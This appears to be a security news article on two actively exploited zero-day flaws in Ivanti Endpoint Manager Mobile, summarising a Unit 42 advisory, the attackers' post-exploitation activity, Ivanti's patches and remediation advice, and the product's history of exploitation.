Attackers are actively exploiting two critical zero-day vulnerabilities in Ivanti’s Endpoint Manager Mobile (EPMM) to gain unauthenticated control of enterprise mobile device management infrastructure and install backdoors engineered to persist even after organizations apply available patches.
“Two critical zero-day vulnerabilities (CVE-2026-1281 and CVE-2026-1340) affecting Ivanti Endpoint Manager Mobile (EPMM) are being actively exploited in the wild, affecting enterprise mobile fleets and corporate networks,” Palo Alto Networks’ Unit 42 threat research team said in an advisory. “These vulnerabilities allow unauthenticated attackers to remotely execute arbitrary code on target servers, granting them full control over mobile device management (MDM) infrastructure without requiring user interaction or credentials.”
EPMM, formerly known as MobileIron Core, is a mobile device management platform that enterprises use to manage and enforce security policies on employee smartphones and tablets.
Palo Alto Networks’ attack surface management platform Cortex Xpanse found more than 4,400 EPMM instances currently exposed on the public internet. Compromise of the platform gives attackers access to device policies, credentials, and metadata across an organization’s entire mobile fleet, Unit 42 warned in the advisory.
Both vulnerabilities carry a CVSS score of 9.8 and allow unauthenticated attackers to execute arbitrary commands on exposed EPMM servers without any user interaction or valid credentials.
Ivanti acknowledged the attacks when it released emergency patches in late January, but described the initial impact as limited. “We are aware of a very limited number of customers whose solution has been exploited at the time of disclosure,” the company said in its security advisory.
Both vulnerabilities stem from unsafe Bash script handling in legacy Apache web server configurations, according to Unit 42. CVE-2026-1281 targets the In-House Application Distribution feature; CVE-2026-1340 exploits the same flaw class through a separate script handling the Android File Transfer mechanism. “Although the root cause is the same, they reside in two distinct scripts handling different features,” the advisory explained.
From scan to backdoor
Unit 42 documented threat actors moving rapidly from automated scanning to initial access and then escalating quickly to deploy persistent backdoors designed to outlast patching cycles.
After gaining initial access, attackers immediately attempted to download and execute a second-stage payload. “This second stage typically installs a web shell, a cryptominer, or a persistent backdoor to grant the attacker control of the appliance,” the advisory said.
Unit 42 also said attackers deployed the Nezha open-source monitoring agent to maintain visibility over compromised systems.
The attackers targeted sectors including state and local government, healthcare, manufacturing, professional services, and high technology across the United States, Germany, Australia, and Canada, the advisory added.
Unit 42 also warned that proof-of-concept exploit code for both CVEs is already publicly available, making broader exploitation likely as more threat actors adopt working exploits.
Patch, but verify first
Unit 42 directed organizations to Ivanti’s security advisory for remediation guidance, which recommends applying version-specific RPM patches for EPMM 12.x branches that require no appliance downtime. Ivanti cautioned, however, that the patch does not survive a version upgrade and must be reinstalled if the software is updated. “The permanent fix for this vulnerability will be included in the next product release: 12.8.0.0 expected in Q1 2026.’
Ivanti also warned in its advisory that while its Sentry mobile traffic gateway is not directly vulnerable, EPMM holds command execution permissions on connected Sentry systems.”If an EPMM deployment has been compromised, the attackers might have compromised Ivanti Sentry as well,” Ivanti warned.
For organizations that suspect compromise, the Ivanti advisory suggested against attempting to clean affected systems. Instead, it recommended restoring from a known-good backup or performing a full rebuild, followed by a complete reset of all account passwords, service credentials, and public certificates. With proof-of-concept exploit code already publicly available for both CVEs, broader exploitation is expected as more threat actors adopt working exploits.
A familiar pattern
The targeting of EPMM follows a pattern that will be familiar to Ivanti customers. The product has been exploited at scale before — in 2023, state-sponsored attackers used EPMM zero-days to break into Norwegian government networks, and separate flaws were again exploited in the wild last year.
Ivanti’s Connect Secure VPN product has had a similarly troubled record, with Chinese APT groups exploiting zero-days in back-to-back campaigns that eventually led the US government to order federal agencies to disconnect Ivanti VPN products entirely in February 2024.
No Responses